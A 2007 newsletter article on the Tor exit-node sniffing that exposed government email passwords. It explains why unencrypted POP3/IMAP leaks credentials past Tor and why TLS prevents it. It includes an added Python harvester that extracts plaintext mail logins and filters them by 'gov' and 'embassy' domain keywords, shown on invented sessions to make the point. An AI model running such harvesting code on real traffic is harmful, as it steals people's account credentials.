First published: 31st October 2007
Anonymity and privacy are not the same thing. When you walk down the street you are in public view, but you are a "face in the crowd" and fairly anonymous. You can increase your anonymity, say by wearing a mask (I have an infectious disease today...), but what you are doing is still completely public. Voting is the reverse: the polling station staff record your identity (in Hong Kong it is verified against your ID card), but how you vote is entirely private.
The same applies on the Internet, which brings us to the case reported in this newsletter last month, in which Swedish security researcher Dan Egerstad published a list of one hundred passwords for government-related email accounts, including those of Legislative Council members. Mr. Egerstad has now revealed how he did it. He set up five Tor exit nodes at different locations around the world, each running a custom packet sniffer that looked only at POP3 and IMAP traffic and applied a keyword filter to pick out interesting government-related domains.
Tor is a network of virtual tunnels that allows people and groups to improve their anonymity on the Internet. A user installs a Tor client, and their traffic is relayed through a chain of Tor nodes before exiting to the ordinary Internet to reach its destination. No single node knows both the source and the destination. There are many valid uses for Tor; groups like the Electronic Frontier Foundation (EFF) recommend it for maintaining civil liberties online.
What Tor cannot do is protect the communication after it has left the network: the exit node, and anyone along the route the traffic takes from there to its destination, can examine the contents. If the contents are an unencrypted POP3 or IMAP session, they include your email address and password. The exit node may not learn your IP address, but it now holds your identity (the mailbox) and the credentials to read it, which completely undermines the anonymity Tor provided. The Tor developers are completely open about this limitation, and recommend end-to-end encryption (for mail, TLS between the client and the mail server) to deal with it. The users whose account details were revealed by Mr. Egerstad ignored this advice. RTFM (Read The Friendly Manual).
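To make the two points above concrete (what an exit-node sniffer of the kind described sees in a plaintext POP3 or IMAP session, and why it sees nothing once TLS is in use), here is an added example. It is not Mr. Egerstad's code and not part of the original article; it reconstructs a POP3/IMAP credential harvester with a domain keyword filter and runs it over constructed session transcripts. The account names, hosts, passwords and keyword list are all made up for illustration.

```python
import base64
import re

# Constructed transcripts of what a Tor exit node (or any hop after it) sees when the
# client speaks plain POP3/IMAP. Accounts, hosts and passwords are invented.
POP3_PLAIN = b"""+OK POP3 server ready
USER clerk@legco.gov.hk
+OK
PASS correct-horse
+OK Logged in.
STAT
+OK 2 4096
QUIT
+OK Bye
"""

IMAP_PLAIN = b"""* OK IMAP4rev1 ready
a001 LOGIN "press@embassy.example" "pa\\"ss word"
a001 OK LOGIN completed
a002 SELECT INBOX
"""

# SASL PLAIN with an initial response: base64 of "\\0bob@example.com\\0hunter2".
POP3_SASL_PLAIN = b"""+OK POP3 server ready
AUTH PLAIN AGJvYkBleGFtcGxlLmNvbQBodW50ZXIy
+OK
"""

# After STARTTLS the rest of the stream is TLS records (0x16 0x03 ... is a ClientHello),
# so the LOGIN that follows it never appears in the clear.
IMAP_STARTTLS = b"""* OK IMAP4rev1 ready
a001 STARTTLS
a001 OK Begin TLS negotiation now
\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x03
"""

# Implicit TLS (ports 993/995): the very first byte is already a TLS record.
IMAP_IMPLICIT_TLS = b"\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x03"

POP3_USER = re.compile(rb"^USER (\S+)\s*$", re.M | re.I)
POP3_PASS = re.compile(rb"^PASS (.+?)\s*$", re.M | re.I)
IMAP_LOGIN = re.compile(
    rb'^(?P<tag>\S+) LOGIN (?P<user>"(?:[^"\\]|\\.)*"|\S+) (?P<pw>"(?:[^"\\]|\\.)*"|\S+)\s*$',
    re.M | re.I)
SASL_PLAIN = re.compile(rb"^(?:\S+ )?AUTH(?:ENTICATE)? PLAIN (\S+)\s*$", re.M | re.I)
STARTTLS_CMD = re.compile(rb"^(?:\S+ )?(?:STARTTLS|STLS)\s*$", re.M | re.I)


def _unquote(tok: bytes) -> str:
    """Strip IMAP quoting and backslash escapes from a quoted string token."""
    if len(tok) >= 2 and tok[:1] == b'"' and tok[-1:] == b'"':
        tok = re.sub(rb"\\(.)", rb"\1", tok[1:-1])
    return tok.decode("utf-8", "replace")


def extract_credentials(session: bytes) -> list[tuple[str, str, str]]:
    """Return (mechanism, user, password) triples visible in clear in one TCP session."""
    found: list[tuple[str, str, str]] = []
    if session[:1] == b"\x16":
        return found                      # TLS from byte zero: nothing readable
    cut = STARTTLS_CMD.search(session)
    if cut:
        session = session[:cut.start()]   # everything after STARTTLS is ciphertext
    for user, pw in zip(POP3_USER.findall(session), POP3_PASS.findall(session)):
        found.append(("POP3 USER/PASS", user.decode(), pw.decode()))
    for m in IMAP_LOGIN.finditer(session):
        found.append(("IMAP LOGIN", _unquote(m.group("user")), _unquote(m.group("pw"))))
    for blob in SASL_PLAIN.findall(session):
        parts = base64.b64decode(blob).split(b"\x00")
        if len(parts) == 3:               # authzid, authcid, password
            found.append(("SASL PLAIN", parts[1].decode(), parts[2].decode()))
    return found


def harvest(sessions, domain_keywords):
    """The keyword-filtered log an exit-node sniffer would keep: credentials from
    plaintext sessions whose mail domain contains one of the keywords."""
    hits = []
    for s in sessions:
        for mech, user, pw in extract_credentials(s):
            domain = user.rpartition("@")[2].lower()
            if any(k in domain for k in domain_keywords):
                hits.append((mech, user, pw))
    return hits


if __name__ == "__main__":
    captured = [POP3_PLAIN, IMAP_PLAIN, POP3_SASL_PLAIN, IMAP_STARTTLS, IMAP_IMPLICIT_TLS]
    for hit in harvest(captured, ("gov", "embassy")):
        print(hit)
```

Run as-is, the two plaintext government-looking logins are printed and the STARTTLS and implicit-TLS sessions yield nothing, which is the whole of the Tor developers' advice in one run: the sniffer does not need to break Tor, it only needs clients that send credentials in the clear. The fix on the client side is to require TLS (POP3 on port 995 or IMAP on 993, or STARTTLS on the plain ports) and to verify the server certificate, so that an exit node cannot also play man-in-the-middle.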
On 5th September 2007, one of the people who used Tor without reading the manual, Hon. Sin Chung Kai, wrote of Mr. Egerstad, "I seriously condemn the hacking activities of this person. His attack to the network likely constitutes a violation of Hong Kong laws, such as Telecommunication Ordinance (Chapter 106) Section 27A Unauthorized access to computer by telecommunications; Crimes Ordinance (Chapter 200) Section 161 Access to computer with criminal or dishonest intent, etc, which can lead to criminal liability." From the details revealed by Mr. Egerstad, it is clear that there was no unauthorised access to a computer, and no apparent criminal or dishonest intent. Perhaps Hon. Sin would like to withdraw his accusation and apologise to Mr. Egerstad?